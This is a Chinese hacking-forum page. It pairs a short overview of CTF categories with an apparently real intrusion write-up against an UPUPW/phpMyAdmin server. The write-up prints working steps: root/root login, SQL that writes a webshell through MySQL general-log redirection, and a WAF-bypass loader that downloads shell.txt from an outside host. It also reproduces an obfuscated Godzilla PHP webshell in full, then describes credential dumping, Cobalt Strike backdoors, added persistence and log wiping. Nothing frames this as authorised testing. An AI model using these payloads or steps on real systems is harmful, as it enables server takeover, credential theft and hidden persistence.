几乎都是线下赛,进行混合模式,因为攻防模式的题目容易出现易守难攻、比速度节题这种学习不到知识的问题,也因为这样,大部分的总决赛都是以逆向为主,很容易变成逆行大赛。那么像web选手去干吗呢?喝茶打杂去吧!刚学没多久,又比较懒,关于总决赛的都是在网上获取信息的,想了解详细的参考 第五届XCTF总决赛的赛制以及新型攻防赛题之探索 题目分类 题目一般为6大类: 1.Web(网络安全) Web是CTF竞赛中主要的题型之一,题目涉及到许多常见的WEB漏洞,诸如XSS、文件包含、代码执行、上传漏洞、SQL注入。也有一些简单的关于网络基础知识的考察,例如返回包、TCP-IP、数据包内容和构造。可以说题目环境比较接近真实环境。 所需知识点:PHP、Python、SQL(以mysql为主)、TCP-IP、linux命令、html、javascript等。 2.MISC(安全杂项) MISC是大型CTF竞赛的题目难度很大,是一个可以拉开分数的类型,而在小型竞赛和题库中却难度不大。题目涉及隐写术、流量分析、电子取证、人肉搜索、数据分析、大数据统计等等,覆盖面比较广,主要考查参赛选手的各种基础综合知识。 所需知识点:熟悉使用众多隐写工具、流量审查工具、了解编码等。 3.Crypto(密码学) 主要包括古典密码学和现代密码学两部分内容,古典密码学趣味性强,种类繁多,现代密码学安全性高,对算法理解的要求较高。 所需知识点:矩阵、数论、古典密码学、算法等。 4.Reverse(逆向) 题目涉及到软件逆向、破解技术等,要求有较强的反汇编、反编译扎实功底。主要考查参赛选手的逆向分析能力。 所需知识点:汇编语言、加密与解密、常见反编译工具。 5.PWN(二进制安全) PWN在黑客俚语中代表着攻破,取得权限,在CTF比赛中它代表着溢出类的题目,其中常见类型溢出漏洞有栈溢出、堆溢出。主要考察参数选手对漏洞的利用能力。 所需知识点:C,OD+IDA,数据结构,操作系统。 6.Mobile(移动安全) 主要介绍了安卓逆向中的常用工具和主要题型,安卓逆向常常需要一定的安卓开发知识,iOS 逆向题目在 CTF 竞赛中较少出现,因此不作过多介绍。 7.(区块链) -近来多个CTF比赛均出现区块链题目,区块链应用越来越成为热门应用,在未来区块链会成为一个重点。因为没有接触过,这里不详细讲。 查看完整article
  14. 确定目标 收集信息 x.x.x.x 首先常规测试方法一顿怼,目录扫描,端口扫描,js文件,中间件,指纹识别,反正该上的都上。。。。 随手加个路径,报错了,当看到这个界面我瞬间就有思路了 为什么这么说呢,因为之前我就碰见过这样的网站报错, 这是一个php集成环境,叫upupw,跟phpstudy是一样的 upupw --> pmd phpstudy --> phpmyadmin 突破点 这个集成环境包也有个phpinfo的页面,跟数据库管理界面 u.php 测试一下弱口令 root/root 连接成功后就可以看到phpinfo的页面 好了现在问题变成phpmyadmin拿shell getshell 三步拿shell set global general_log='on'; SET global general_log_file='D:/xxxx/WWW/cmd.php'; SELECT '<?php assert($_POST["cmd"]);?>'; 当执行第三步的时候页面 卡在执行中。。。没有反应 瞬间感觉不对,可能存在waf 换了个免杀马试试,先写到txt里边看看成否成功 没有任何问题,下面直接写入php文件 可以写入,直接去连接shell 果然有waf,当时写入的时候就感觉到了,不免杀的shell,sql语句执行不了 绕过waf 怼了半天都不知道是什么鬼waf,用下载文件试试 为了避免拦截php代码的waf,我这里远程下载的脚本是利用JavaScript转写php SET global general_log_file='C:/Users/Administrator/Desktop/UPUPW_AP5.5_64/htdocs/11.php'; SELECT '<script language="php"> $a="http://x.x.x.x:81/shell.txt";$b="file"."_g"."et_"."contents";$b = $b($a);file_put_contents("shell.php",$b); </script>' 访问11.php 就会生成shell.php 这里的shell也是用了哥斯拉的免杀shell <?php session_start(); @set_time_limit(0); @error_reporting(0); function E($D,$K){ for($i=0;$i<strlen($D);$i++) { $D[$i] = $D[$i]^$K[$i+1&15]; } return $D; } function Q($D){ return base64_encode($D); } function O($D){ return base64_decode($D); } $P='pass'; $V='payload'; $T='3c6e0b8a9c15224a'; if (isset($_POST[$P])){ $F=O(E(O($_POST[$P]),$T)); if (isset($_SESSION[$V])){ $L=$_SESSION[$V]; $A=explode('|',$L); class C{public function nvoke($p) {eval($p."");}} $R=new C(); $R->nvoke($A[0]); echo substr(md5($P.$T),0,16); echo Q(E(@run($F),$T)); echo substr(md5($P.$T),16); }else{ $_SESSION[$V]=$F; } } 尝试了这么多次 进程里没有waf进程 权限是system 脱源码 上传抓密码工具,直接获取管理密码,登上服务器 留后门,清理痕迹 多留几个后门,万一被删 这个网段还有这么多机器 源码 打开源码才发现waf是360webscan 总结: 1.信息收集,目录扫描,端口扫描,JS文件敏感文件扫描,中间件扫描,指纹识别无任何可利用信息 2.通过在网址后加入错误路径,报错信息“为找到,法海不懂爱,页面显示不出来”,该系统是php集成环境upupw 3.该环境有个叫phpinfo的文件为u.php,输入弱口令root/root,可直接进入phpmyadmin,同时可查看phpinfo的信息,暴露出网站的绝对路径为D:/xxxx/WWW/UPUPW_AP5.5_64/htdocs/ 4.phpmyadmin通过写入日志获取shell set global general_log='on'; SET global general_log_file='D:/xxxx/WWW/UPUPW_AP5.5_64/htdocs/cmd.php'; SELECT '<?php assert($_POST["cmd"]);?>'; 5.可直接写入一句话,但是连接shell,被WAF拦截 6.通过远程下载的脚本是利用JavaScript转写php绕过WAF(360webscan) SET global general_log_file='D:/xxxx/WWW/UPUPW_AP5.5_64/htdocs/11.php'; SELECT '<script language="php"> $a="http://x.x.x.x:81/shell.txt";$b="file"."_g"."et_"."contents";$b = $b($a);file_put_contents("shell.php",$b); </script>' 7.访问11.php 就会生成shell.php shell.txt: <?php session_start(); @set_time_limit(0); @error_reporting(0); function E($D,$K){ for($i=0;$i<strlen($D);$i++) { $D[$i] = $D[$i]^$K[$i+1&15]; } return $D; } function Q($D){ return base64_encode($D); } function O($D){ return base64_decode($D); } $P='pass'; $V='payload'; $T='3c6e0b8a9c15224a'; if (isset($_POST[$P])){ $F=O(E(O($_POST[$P]),$T)); if (isset($_SESSION[$V])){ $L=$_SESSION[$V]; $A=explode('|',$L); class C{public function nvoke($p) {eval($p."");}} $R=new C(); $R->nvoke($A[0]); echo substr(md5($P.$T),0,16); echo Q(E(@run($F),$T)); echo substr(md5($P.$T),16); }else{ $_SESSION[$V]=$F; } } 8.通过格拉斯连接shell,然后查看进程tasklist,并无杀毒软件,查看权限whoami,是system权限 9.上传 hash抓取本地密码,可抓取windows本地用户名和密码 10.上传cs的生成的后门文件,并执行。 11.下载源码,发现WAF使用的360webscan

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    ×
    ×
    • 创建新的...